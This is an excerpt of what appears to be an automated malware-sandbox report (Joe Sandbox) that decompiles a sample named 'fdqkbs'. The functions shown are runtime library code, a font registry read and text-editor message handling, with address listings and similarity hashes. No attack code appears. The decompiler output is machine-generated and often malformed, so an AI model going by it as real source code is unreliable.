                                                                                  • API ID: CloseCreateDestroyFileHandleInvalidateRectWindowlstrcatlstrcpynlstrlen
                                                                                  • String ID: .txt
                                                                                  • API String ID: 1344828188-2195685702
                                                                                  • Opcode ID: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
                                                                                  • Instruction ID: d28bfcdb09bc5182ac3aec5d8d3b4e3140d473f0e5bda905505ba1bfea716dd4
                                                                                  • Opcode Fuzzy Hash: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
                                                                                  • Instruction Fuzzy Hash: CB4126729002219ADB306B619D8CBBB76A8DB54318F65413BF542F72E1E7BD4EC1C358
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 96%
                                                                                  			E00406359(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				intOrPtr* _t49;
                                                                                  				struct _CRITICAL_SECTION* _t50;
                                                                                  				struct _CRITICAL_SECTION* _t54;
                                                                                  				intOrPtr _t55;
                                                                                  				struct _CRITICAL_SECTION* _t57;
                                                                                  				signed int _t62;
                                                                                  				struct _CRITICAL_SECTION* _t67;
                                                                                  				void* _t82;
                                                                                  				struct _CRITICAL_SECTION* _t84;
                                                                                  				signed int _t86;
                                                                                  				void* _t87;
                                                                                  
                                                                                  				_t82 = __edx;
                                                                                  				_push(0x10);
                                                                                  				_push(0x4120d8);
                                                                                  				E00405990(__ebx, __edi, __esi);
                                                                                  				_t84 = 0;
                                                                                  				 *(_t87 - 0x1c) = 0;
                                                                                  				E0040A357(0, 0, 1);
                                                                                  				 *((intOrPtr*)(_t87 - 4)) = 0;
                                                                                  				_t86 = 0;
                                                                                  				while(1) {
                                                                                  					 *(_t87 - 0x20) = _t86;
                                                                                  					if(_t86 >=  *0x4182a0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t49 =  *0x417284 + _t86 * 4;
                                                                                  					if( *_t49 == 0) {
                                                                                  						_t50 = E00408BFA(0x38);
                                                                                  						 *( *0x417284 + _t86 * 4) = _t50;
                                                                                  						__eflags = _t50;
                                                                                  						if(_t50 != 0) {
                                                                                  							_t54 = InitializeCriticalSectionAndSpinCount( *( *0x417284 + _t86 * 4) + 0x20, 0xfa0);
                                                                                  							__eflags = _t54;
                                                                                  							_t55 =  *0x417284;
                                                                                  							if(_t54 != 0) {
                                                                                  								_t57 =  *((intOrPtr*)(_t55 + _t86 * 4)) + 0x20;
                                                                                  								__eflags = _t57;
                                                                                  								EnterCriticalSection(_t57);
                                                                                  								_t84 =  *( *0x417284 + _t86 * 4);
                                                                                  								 *(_t87 - 0x1c) = _t84;
                                                                                  								 *(_t84 + 0xc) = 0;
                                                                                  							} else {
                                                                                  								E00408BC0( *((intOrPtr*)(_t55 + _t86 * 4)));
                                                                                  								 *( *0x417284 + _t86 * 4) = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					_t62 =  *( *_t49 + 0xc);
                                                                                  					if((_t62 & 0x00000083) != 0 || (_t62 & 0x00008000) != 0) {
                                                                                  						L9:
                                                                                  						_t86 = _t86 + 1;
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						_t11 = _t86 - 3; // -3
                                                                                  						_t94 = _t11 - 0x10;
                                                                                  						if(_t11 > 0x10) {
                                                                                  							L7:
                                                                                  							E004058F0(_t86,  *( *0x417284 + _t86 * 4));
                                                                                  							_t67 =  *( *0x417284 + _t86 * 4);
                                                                                  							if(( *(_t67 + 0xc) & 0x00000083) == 0) {
                                                                                  								_t84 = _t67;
                                                                                  								 *(_t87 - 0x1c) = _t84;
                                                                                  								break;
                                                                                  							} else {
                                                                                  								E0040595E(_t86, _t67);
                                                                                  								goto L9;
                                                                                  							}
                                                                                  						}
                                                                                  						_t12 = _t86 + 0x10; // 0x10
                                                                                  						if(E0040A295(0, _t82, _t84, _t86, _t94) == 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  				}
                                                                                  				__eflags = _t84;
                                                                                  				if(_t84 != 0) {
                                                                                  					 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00008000;
                                                                                  					 *((intOrPtr*)(_t84 + 4)) = 0;
                                                                                  					 *((intOrPtr*)(_t84 + 8)) = 0;
                                                                                  					 *_t84 = 0;
                                                                                  					 *((intOrPtr*)(_t84 + 0x1c)) = 0;
                                                                                  					_t40 = _t84 + 0x10;
                                                                                  					 *_t40 =  *(_t84 + 0x10) | 0xffffffff;
                                                                                  					__eflags =  *_t40;
                                                                                  				}
                                                                                  				 *((intOrPtr*)(_t87 - 4)) = 0xfffffffe;
                                                                                  				E00406483();
                                                                                  				return E004059D5(_t84);
                                                                                  			}














                                                                                  0x00406359
                                                                                  0x00406359
                                                                                  0x0040635b
                                                                                  0x00406360
                                                                                  0x00406367
                                                                                  0x00406369
                                                                                  0x0040636e
                                                                                  0x00406374
                                                                                  0x00406377
                                                                                  0x00406379
                                                                                  0x00406379
                                                                                  0x00406382
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040638d
                                                                                  0x00406392
                                                                                  0x004063f1
                                                                                  0x004063fd
                                                                                  0x00406400
                                                                                  0x00406402
                                                                                  0x00406415
                                                                                  0x0040641b
                                                                                  0x0040641d
                                                                                  0x00406422
                                                                                  0x0040643a
                                                                                  0x0040643a
                                                                                  0x0040643e
                                                                                  0x00406449
                                                                                  0x0040644c
                                                                                  0x0040644f
                                                                                  0x00406424
                                                                                  0x00406427
                                                                                  0x00406432
                                                                                  0x00406432
                                                                                  0x00406422
                                                                                  0x00000000
                                                                                  0x00406402
                                                                                  0x00406396
                                                                                  0x0040639b
                                                                                  0x004063e5
                                                                                  0x004063e5
                                                                                  0x00000000
                                                                                  0x004063a4
                                                                                  0x004063a4
                                                                                  0x004063a7
                                                                                  0x004063aa
                                                                                  0x004063be
                                                                                  0x004063c7
                                                                                  0x004063d3
                                                                                  0x004063da
                                                                                  0x004063e8
                                                                                  0x004063ea
                                                                                  0x00000000
                                                                                  0x004063dc
                                                                                  0x004063de
                                                                                  0x00000000
                                                                                  0x004063e4
                                                                                  0x004063da
                                                                                  0x004063ac
                                                                                  0x004063b8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004063b8
                                                                                  0x0040639b
                                                                                  0x00406452
                                                                                  0x00406454
                                                                                  0x00406456
                                                                                  0x0040645d
                                                                                  0x00406460
                                                                                  0x00406463
                                                                                  0x00406465
                                                                                  0x00406468
                                                                                  0x00406468
                                                                                  0x00406468
                                                                                  0x00406468
                                                                                  0x0040646c
                                                                                  0x00406473
                                                                                  0x0040647f

                                                                                  APIs
                                                                                    • Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
                                                                                    • Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
                                                                                    • Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381
                                                                                  • __mtinitlocknum.LIBCMT ref: 004063B0
                                                                                  • __malloc_crt.LIBCMT ref: 004063F1
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,004120D8,00000010,00403123,00412030,0000000C,004031A1,?,?,00000040,?,004025E0,?,00410660), ref: 00406415
                                                                                  • _free.LIBCMT ref: 00406427
                                                                                  • EnterCriticalSection.KERNEL32(?,?,004025E0,?,00410660), ref: 0040643E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                                                                                  • String ID: ?
                                                                                  • API String ID: 2015852156-3428610318
                                                                                  • Opcode ID: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
                                                                                  • Instruction ID: b9cd1371c41a4ab66219e786f190016f3e2e04b6ac3045ceef4f163d49476006
                                                                                  • Opcode Fuzzy Hash: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
                                                                                  • Instruction Fuzzy Hash: 523170715046019FC710DFA9D481A5AB7F4BB08324B5181BFF496A72D2CB79D4528F4D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E0040717C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t30;
                                                                                  				intOrPtr _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				_t31 = __ebx;
                                                                                  				_push(8);
                                                                                  				_push(0x412118);
                                                                                  				E00405990(__ebx, __edi, __esi);
                                                                                  				GetModuleHandleW(L"KERNEL32.DLL");
                                                                                  				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                  				 *((intOrPtr*)(_t39 + 0x5c)) = 0x411108;
                                                                                  				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                                  				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                  				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                  				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                  				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                  				 *(_t39 + 0x68) = 0x414588;
                                                                                  				E0040A357(__ebx, 1, 0xd);
                                                                                  				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                  				InterlockedIncrement( *(_t39 + 0x68));
                                                                                  				 *(_t40 - 4) = 0xfffffffe;
                                                                                  				E0040721E();
                                                                                  				E0040A357(_t31, 1, 0xc);
                                                                                  				 *(_t40 - 4) = 1;
                                                                                  				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                  				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                                  				if(_t26 == 0) {
                                                                                  					_t30 =  *0x414cf0; // 0x414c18
                                                                                  					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                                  				}
                                                                                  				E00408700( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                  				 *(_t40 - 4) = 0xfffffffe;
                                                                                  				return E004059D5(E00407227());
                                                                                  			}







                                                                                  0x0040717c
                                                                                  0x0040717c
                                                                                  0x0040717e
                                                                                  0x00407183
                                                                                  0x0040718d
                                                                                  0x00407193
                                                                                  0x00407196
                                                                                  0x0040719d
                                                                                  0x004071a4
                                                                                  0x004071a7
                                                                                  0x004071aa
                                                                                  0x004071b1
                                                                                  0x004071b8
                                                                                  0x004071c1
                                                                                  0x004071c7
                                                                                  0x004071ce
                                                                                  0x004071d4
                                                                                  0x004071db
                                                                                  0x004071e2
                                                                                  0x004071e8
                                                                                  0x004071eb
                                                                                  0x004071ee
                                                                                  0x004071f3
                                                                                  0x004071f5
                                                                                  0x004071fa
                                                                                  0x004071fa
                                                                                  0x00407200
                                                                                  0x00407206
                                                                                  0x00407217

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412118,00000008,00407284,00000000,00000000,?,004033DA,004029D6,?,?,?,004029D6,00000000,?), ref: 0040718D
                                                                                  • __lock.LIBCMT ref: 004071C1
                                                                                    • Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
                                                                                    • Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
                                                                                    • Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 004071CE
                                                                                  • __lock.LIBCMT ref: 004071E2
                                                                                  • ___addlocaleref.LIBCMT ref: 00407200
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                  • String ID: KERNEL32.DLL
                                                                                  • API String ID: 637971194-2576044830
                                                                                  • Opcode ID: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
                                                                                  • Instruction ID: 828e2d9a6aef1ecd1850dd2157baaa58032c3ea6c81483b33c0403e429775c2e
                                                                                  • Opcode Fuzzy Hash: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
                                                                                  • Instruction Fuzzy Hash: 18016571844B00EBD710DF6AD805749FBE0BF54325F20891FE599663E1CBB8A544CF19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 81%
                                                                                  			E0040823F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed int _t15;
                                                                                  				LONG* _t21;
                                                                                  				void* _t31;
                                                                                  				LONG* _t33;
                                                                                  				void* _t34;
                                                                                  				void* _t35;
                                                                                  
                                                                                  				_t35 = __eflags;
                                                                                  				_t29 = __edx;
                                                                                  				_t25 = __ebx;
                                                                                  				_push(0xc);
                                                                                  				_push(0x4121a8);
                                                                                  				E00405990(__ebx, __edi, __esi);
                                                                                  				_t31 = E004072A9(__ebx, __edx, _t35);
                                                                                  				_t15 =  *0x414aa8; // 0xfffffffe
                                                                                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                  					E0040A357(_t25, _t31, 0xd);
                                                                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                  					_t33 =  *(_t31 + 0x68);
                                                                                  					 *(_t34 - 0x1c) = _t33;
                                                                                  					__eflags = _t33 -  *0x4149b0; // 0x2392c18
                                                                                  					if(__eflags != 0) {
                                                                                  						__eflags = _t33;
                                                                                  						if(__eflags != 0) {
                                                                                  							__eflags = InterlockedDecrement(_t33);
                                                                                  							if(__eflags == 0) {
                                                                                  								__eflags = _t33 - 0x414588;
                                                                                  								if(__eflags != 0) {
                                                                                  									E00408BC0(_t33);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t21 =  *0x4149b0; // 0x2392c18
                                                                                  						 *(_t31 + 0x68) = _t21;
                                                                                  						_t33 =  *0x4149b0; // 0x2392c18
                                                                                  						 *(_t34 - 0x1c) = _t33;
                                                                                  						InterlockedIncrement(_t33);
                                                                                  					}
                                                                                  					 *(_t34 - 4) = 0xfffffffe;
                                                                                  					E004082DA();
                                                                                  				} else {
                                                                                  					_t33 =  *(_t31 + 0x68);
                                                                                  				}
                                                                                  				_t38 = _t33;
                                                                                  				if(_t33 == 0) {
                                                                                  					_push(0x20);
                                                                                  					E004069B9(_t29, _t38);
                                                                                  				}
                                                                                  				return E004059D5(_t33);
                                                                                  			}









                                                                                  0x0040823f
                                                                                  0x0040823f
                                                                                  0x0040823f
                                                                                  0x0040823f
                                                                                  0x00408241
                                                                                  0x00408246
                                                                                  0x00408250
                                                                                  0x00408252
                                                                                  0x0040825a
                                                                                  0x0040827b
                                                                                  0x00408281
                                                                                  0x00408285
                                                                                  0x00408288
                                                                                  0x0040828b
                                                                                  0x00408291
                                                                                  0x00408293
                                                                                  0x00408295
                                                                                  0x0040829e
                                                                                  0x004082a0
                                                                                  0x004082a2
                                                                                  0x004082a8
                                                                                  0x004082ab
                                                                                  0x004082b0
                                                                                  0x004082a8
                                                                                  0x004082a0
                                                                                  0x004082b1
                                                                                  0x004082b6
                                                                                  0x004082b9
                                                                                  0x004082bf
                                                                                  0x004082c3
                                                                                  0x004082c3
                                                                                  0x004082c9
                                                                                  0x004082d0
                                                                                  0x00408262
                                                                                  0x00408262
                                                                                  0x00408262
                                                                                  0x00408265
                                                                                  0x00408267
                                                                                  0x00408269
                                                                                  0x0040826b
                                                                                  0x00408270
                                                                                  0x00408278

                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0040824B
                                                                                    • Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
                                                                                    • Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9
                                                                                  • __amsg_exit.LIBCMT ref: 0040826B
                                                                                  • __lock.LIBCMT ref: 0040827B
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00408298
                                                                                  • _free.LIBCMT ref: 004082AB
                                                                                  • InterlockedIncrement.KERNEL32(02392C18), ref: 004082C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                  • String ID:
                                                                                  • API String ID: 3470314060-0
                                                                                  • Opcode ID: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
                                                                                  • Instruction ID: 9dd0b61804cb2939324514bc7d4c0d8b777e788f75e63934b552d476fc708038
                                                                                  • Opcode Fuzzy Hash: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
                                                                                  • Instruction Fuzzy Hash: 5D018E71901B11EBCA10AB66A645B9A7760AB44760F1540BFE854732C0CB3C68918B9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00401051() {
                                                                                  				char _v8;
                                                                                  				void* _v12;
                                                                                  				int _v16;
                                                                                  				int _v20;
                                                                                  				long _t17;
                                                                                  				char _t19;
                                                                                  
                                                                                  				_t19 = 0x60;
                                                                                  				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v12) == 0) {
                                                                                  					_v16 = 4;
                                                                                  					_t17 = RegQueryValueExW(_v12, L"LogPixels", 0,  &_v20,  &_v8,  &_v16);
                                                                                  					if(_t17 == 0 && _v20 == 4 && _v8 != _t17) {
                                                                                  						_t19 = _v8;
                                                                                  					}
                                                                                  					RegCloseKey(_v12);
                                                                                  				}
                                                                                  				return _t19;
                                                                                  			}









                                                                                  0x0040105a
                                                                                  0x00401071
                                                                                  0x00401089
                                                                                  0x00401090
                                                                                  0x00401098
                                                                                  0x004010a5
                                                                                  0x004010a5
                                                                                  0x004010ab
                                                                                  0x004010ab
                                                                                  0x004010b5

                                                                                  APIs
                                                                                  • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
                                                                                  • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004010AB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: LogPixels$Software\Fonts
                                                                                  • API String ID: 3677997916-4238338266
                                                                                  • Opcode ID: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
                                                                                  • Instruction ID: a9dc7ae54450fe8809de1ee31deae739da478254df8c1b302dfb453a41a3a578
                                                                                  • Opcode Fuzzy Hash: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
                                                                                  • Instruction Fuzzy Hash: 6CF03776A00209FADB209B94DC04FEFBBB8EB44705F104177EA41B2190E6B49A88CB19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 94%
                                                                                  			E0040C5DF(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                  				void* _t7;
                                                                                  				long _t8;
                                                                                  				intOrPtr* _t9;
                                                                                  				intOrPtr* _t12;
                                                                                  				long _t27;
                                                                                  				long _t30;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_push(__esi);
                                                                                  					_t30 = _a8;
                                                                                  					__eflags = _t30;
                                                                                  					if(_t30 != 0) {
                                                                                  						_push(__edi);
                                                                                  						while(1) {
                                                                                  							__eflags = _t30 - 0xffffffe0;
                                                                                  							if(_t30 > 0xffffffe0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags = _t30;
                                                                                  							if(_t30 == 0) {
                                                                                  								_t30 = _t30 + 1;
                                                                                  								__eflags = _t30;
                                                                                  							}
                                                                                  							_t7 = HeapReAlloc( *0x415a64, 0, _a4, _t30);
                                                                                  							_t27 = _t7;
                                                                                  							__eflags = _t27;
                                                                                  							if(_t27 != 0) {
                                                                                  								L17:
                                                                                  								_t8 = _t27;
                                                                                  							} else {
                                                                                  								__eflags =  *0x415f58 - _t7;
                                                                                  								if(__eflags == 0) {
                                                                                  									_t9 = E0040370A(__eflags);
                                                                                  									 *_t9 = E004036C8(GetLastError());
                                                                                  									goto L17;
                                                                                  								} else {
                                                                                  									__eflags = E0040B343(_t7, _t30);
                                                                                  									if(__eflags == 0) {
                                                                                  										_t12 = E0040370A(__eflags);
                                                                                  										 *_t12 = E004036C8(GetLastError());
                                                                                  										L12:
                                                                                  										_t8 = 0;
                                                                                  										__eflags = 0;
                                                                                  									} else {
                                                                                  										continue;
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  							goto L14;
                                                                                  						}
                                                                                  						E0040B343(_t6, _t30);
                                                                                  						 *((intOrPtr*)(E0040370A(__eflags))) = 0xc;
                                                                                  						goto L12;
                                                                                  					} else {
                                                                                  						E00408BC0(_a4);
                                                                                  						_t8 = 0;
                                                                                  					}
                                                                                  					L14:
                                                                                  					return _t8;
                                                                                  				} else {
                                                                                  					return E0040C4C9(__edx, __edi, __esi, _a8);
                                                                                  				}
                                                                                  			}









                                                                                  0x0040c5e8
                                                                                  0x0040c5f5
                                                                                  0x0040c5f6
                                                                                  0x0040c5f9
                                                                                  0x0040c5fb
                                                                                  0x0040c60a
                                                                                  0x0040c63d
                                                                                  0x0040c63d
                                                                                  0x0040c640
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c60d
                                                                                  0x0040c60f
                                                                                  0x0040c611
                                                                                  0x0040c611
                                                                                  0x0040c611
                                                                                  0x0040c61e
                                                                                  0x0040c624
                                                                                  0x0040c626
                                                                                  0x0040c628
                                                                                  0x0040c688
                                                                                  0x0040c688
                                                                                  0x0040c62a
                                                                                  0x0040c62a
                                                                                  0x0040c630
                                                                                  0x0040c672
                                                                                  0x0040c686
                                                                                  0x00000000
                                                                                  0x0040c632
                                                                                  0x0040c639
                                                                                  0x0040c63b
                                                                                  0x0040c65a
                                                                                  0x0040c66e
                                                                                  0x0040c654
                                                                                  0x0040c654
                                                                                  0x0040c654
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c63b
                                                                                  0x0040c630
                                                                                  0x00000000
                                                                                  0x0040c656
                                                                                  0x0040c643
                                                                                  0x0040c64e
                                                                                  0x00000000
                                                                                  0x0040c5fd
                                                                                  0x0040c600
                                                                                  0x0040c606
                                                                                  0x0040c606
                                                                                  0x0040c657
                                                                                  0x0040c659
                                                                                  0x0040c5ea
                                                                                  0x0040c5f4
                                                                                  0x0040c5f4

                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040C5ED
                                                                                    • Part of subcall function 0040C4C9: __FF_MSGBANNER.LIBCMT ref: 0040C4E2
                                                                                    • Part of subcall function 0040C4C9: __NMSG_WRITE.LIBCMT ref: 0040C4E9
                                                                                    • Part of subcall function 0040C4C9: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00408C0B,00000000,00000001,00000000,?,0040A2E2,00000018,00412270,0000000C,0040A372), ref: 0040C50E
                                                                                  • _free.LIBCMT ref: 0040C600
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1020059152-0
                                                                                  • Opcode ID: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
                                                                                  • Instruction ID: 6a77f78aa43c2d9d91f7950ce4b899985eb708febcdd106683cded96f858de10
                                                                                  • Opcode Fuzzy Hash: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
                                                                                  • Instruction Fuzzy Hash: F411C432410615EACB313FB1AC456AA3B589B543A1F308B3BF849B72D1DB3E8941969C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004010B6() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v524;
                                                                                  				long _t13;
                                                                                  				long _t18;
                                                                                  				int _t19;
                                                                                  				int _t23;
                                                                                  
                                                                                  				SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
                                                                                  				_t19 = _v12;
                                                                                  				if(_t19 == _v8) {
                                                                                  					 *0x4170f0 = _t19;
                                                                                  				}
                                                                                  				if(_t19 >=  *0x4170f0) {
                                                                                  					_t19 = _v8;
                                                                                  				}
                                                                                  				_t23 = SendMessageW( *0x415f6c, 0xc9, _t19, 0);
                                                                                  				_t13 = SendMessageW( *0x415f6c, 0xbb, _t23, 0);
                                                                                  				if( *0x4170f4 != _t23 ||  *0x4170f8 != _t19) {
                                                                                  					_t6 = _t23 + 1; // 0x1
                                                                                  					swprintf( &_v524, 0x231,  *0x415f7c, _t6, _t19 - _t13 + 1);
                                                                                  					_t18 = SendMessageW( *0x415f74, 0x29, 0,  &_v524);
                                                                                  					 *0x4170f4 = _t23;
                                                                                  					 *0x4170f8 = _t19;
                                                                                  					return _t18;
                                                                                  				}
                                                                                  				return _t13;
                                                                                  			}










                                                                                  0x004010db
                                                                                  0x004010dd
                                                                                  0x004010e3
                                                                                  0x004010e5
                                                                                  0x004010e5
                                                                                  0x004010f1
                                                                                  0x004010f3
                                                                                  0x004010f3
                                                                                  0x00401108
                                                                                  0x00401116
                                                                                  0x0040111e
                                                                                  0x0040112e
                                                                                  0x00401144
                                                                                  0x0040115d
                                                                                  0x0040115f
                                                                                  0x00401165
                                                                                  0x00000000
                                                                                  0x00401165
                                                                                  0x0040116f

                                                                                  APIs
                                                                                  • SendMessageW.USER32(000000B0,?,?), ref: 004010DB
                                                                                  • SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
                                                                                  • SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
                                                                                  • swprintf.LIBCMT ref: 00401144
                                                                                  • SendMessageW.USER32(00000029,00000000,?), ref: 0040115D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
